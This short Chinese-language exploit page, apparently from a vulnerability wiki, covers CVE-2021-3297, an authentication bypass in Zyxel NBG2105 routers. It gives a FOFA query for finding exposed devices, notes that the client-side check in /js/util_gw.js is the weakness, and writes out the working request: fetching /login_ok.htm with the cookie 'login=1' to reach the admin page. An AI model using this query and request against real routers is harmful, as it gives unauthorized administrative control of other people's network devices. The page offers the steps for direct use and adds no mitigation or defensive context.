# CVE-2021-3297 Zyxel NBG2105 身份驗證繞過漏洞/zh-hant
==漏洞影響==
Zyxel NBG2105
==FOFA==
app="ZyXEL-NBG2105"

其中前端文件 /js/util_gw.js 存在前端對 Cookie login參數的校驗。
請求如下則會以管理員身份跳轉到 home.htm頁面。
http://xxx.xxx.xxx.xxx/login_ok.htm Cookie: login=1;

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END













请登录后查看评论内容